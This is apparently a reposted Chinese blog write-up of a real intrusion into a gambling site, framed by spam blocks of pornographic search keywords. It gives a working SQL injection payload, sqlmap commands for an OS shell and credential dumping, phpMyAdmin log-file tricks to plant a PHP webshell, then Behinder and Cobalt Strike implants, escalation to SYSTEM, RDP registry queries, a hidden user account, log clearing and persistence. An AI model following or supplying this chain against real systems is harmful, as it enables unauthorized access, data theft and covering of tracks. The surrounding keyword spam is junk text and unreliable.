日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

实战|对某棋牌站的一次getshell

發布時間:2024/1/23 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 实战|对某棋牌站的一次getshell 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

起因

最近在fofa翻目標C段的時候,碰巧看到了這個站便記了下來,等下班回家后直接拿下。

目標環境信息

BC類的活動頁很多都是thinkphp二改的站,我們主要確定當前tp的版本號。

http://www.abc.com/index.php?s=1

目標環境信息

  • Windows
  • ThinkPHP v.3.2.3
  • 開啟Debug模式
  • 網站絕對路徑 D:\web1\abc.com\wwlsoeprsueords\

用工具掃描日志文件

tp3注入漏洞不存在,日志文件在/addons/Runtime/Logs/admin/路徑下,但并沒有掃到任何的日志文件,猜測日志文件可能為另外一個命名格式

eg. 1606510976-20_11_28.log

時間戳-年_月_日.log

該站點沒有CDN,在fofa上搜IP發現999端口為phpmyadmin頁面

尋找注入

一般來說,這類的活動推廣頁申請進度查詢是存在注入的,用burp抓包

payload如下:

username=123' and (extractvalue(1,concat(0x7e,(select user()),0x7e))))--+&id=13

果不其然,存在注入,還是root權限,直接就上sqlmap跑

python3 sqlmap.py -r 1.txt --random-agent --dbms=mysql --os-shell

還跑了幾種其他類型的注入,但我們直接--os-shell報錯,嘗試了幾次都一樣返回No output,猜測可能有某種防護產品。

getshell

前面我們有找到phpmyadmin頁面,我們枚舉數據庫賬戶和密碼

python3 sqlmap.py –r 1.txt --string="Surname" --users --password

并且已經幫我們解碼明文了,root賬號登錄后報錯#1045 無法登錄服務器,換成dog1賬號登錄成功

phpmyadmin寫shell:

  • 導出文件
  • 寫日志文件

SHOW GLOBAL VARIABLES LIKE "%secure%";

當secure_file_priv的值為null,表示限制mysql不允許導入|導出

當secure_file_priv的值沒有具體值時,表示不對mysql的導入|導出做限制

用命令打開日志保存狀態,設置日志保存路徑

set global general_log = "ON";

set global general_log_file='D:/web1/abc.com/robots.php';

在sql查詢語句處執行我們的php一句話,然后用蟻劍去連日志文件robots.php即可getshell

繞過限制上線cs

查看phpinfo(),發現ban了成噸的函數,無法執行命令。

我們可以上傳aspx馬進行繞過,這里我使用的是冰蝎3的aspx馬

現在可以執行命令了,但還是無法查看相關文件夾等其他問題。

查看系統有無殺軟,準備上線

tasklist /svc

沒有任何殺軟,用cs生成exe上傳到根目錄,然后啟動執行上線

用爛土豆可以直接提到system權限

直接通過注冊表查是否開啟3389,端口號是多少

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服務是否開啟:1關閉,0開啟

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber # 查看RDP服務的端口

建一個隱藏用戶直接遠程登錄過去,清除日志,做自啟動,拿下該站點

?

?

?

總結

以上是生活随笔為你收集整理的实战|对某棋牌站的一次getshell的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 欧美成人h版在线观看 | 天天噜日日噜 | 日本成人三级电影 | 五月天综合色 | 欧美中文一区 | 久久久久亚洲精品中文字幕 | 在线观看精品视频 | 欧美做爰猛烈床戏大尺度 | 日韩欧美中文字幕一区二区 | 色欲国产精品一区二区 | 亚洲污片| 久久久久久久一区二区 | 老司机精品在线 | av青草| 91麻豆视频 | 天天av天天 | 国内精品久久久久久久久 | 精品成人久久久 | 天天干天天操天天舔 | 手机看片99 | 三级黄色片免费 | 成人爽爽视频 | 成全影视在线观看第8季 | 欧美亚洲第一页 | 二级毛片 | 免费特级黄毛片 | 国产精品污污 | 人人干人人模 | 国模吧一区二区 | 日韩3p视频 | 国产精品亚洲精品 | 91黄色免费 | 人妻在线一区 | 久久99精品久久久 | 欧美天天 | 日日cao | 富婆如狼似虎找黑人老外 | 能直接看的av网站 | 国产三级av在线 | 3p在线视频| 欧美色图视频在线 | 一吻定情2013日剧 | 最新av中文字幕 | www.午夜av| 老司机午夜免费精品视频 | 国产成人黄色av | 91久久综合精品国产丝袜蜜芽 | 91av国产精品 | 男女靠逼视频 | 成人中文在线 | 日韩另类av | 国外成人免费视频 | 欧美精品免费在线观看 | 无码精品人妻一区二区三区湄公河 | 五月激情六月丁香 | 久久久国产精品一区二区三区 | 狠狠操狠狠操 | 97色在线视频 | www.av777| 欧美整片在线观看 | 美足av | 夜夜操夜夜爽 | 操操av| 日韩电影观看 | 成人片黄网站久久久免费 | 欧美一区二区三区不卡视频 | 在线观看国产黄 | 日韩精品中文字幕一区二区三区 | 一区二区三区激情视频 | 同性色老头性xxxx老头 | 99re5| 后进极品美女白嫩翘臀 | 亚色中文字幕 | 永久免费不卡在线观看黄网站 | 成人短视频在线观看 | 91国产丝袜在线播放 | 成人免费片 | 丁香花完整视频在线观看 | 国产精品久久久久久亚洲影视 | 国产乱人乱偷精品视频a人人澡 | 午夜丁香婷婷 | 毛片毛片毛片毛片毛片 | av在线免| 久久精品色妇熟妇丰满人妻 | 国产蜜臀在线 | 亚洲AV无码成人精品区麻豆 | 午夜亚洲av永久无码精品 | 国产欧美a | 日本精品久久久久中文字幕 | 久久国产精品免费看 | 狠狠操导航 | 婷婷四房综合激情五月 | 亚洲午夜久久久久久久久红桃 | 国产在线激情视频 | 中文字幕精品在线视频 | 国产黄色网址在线观看 | 在线射| 91九色在线视频 | 久久久久99精品成人片试看 |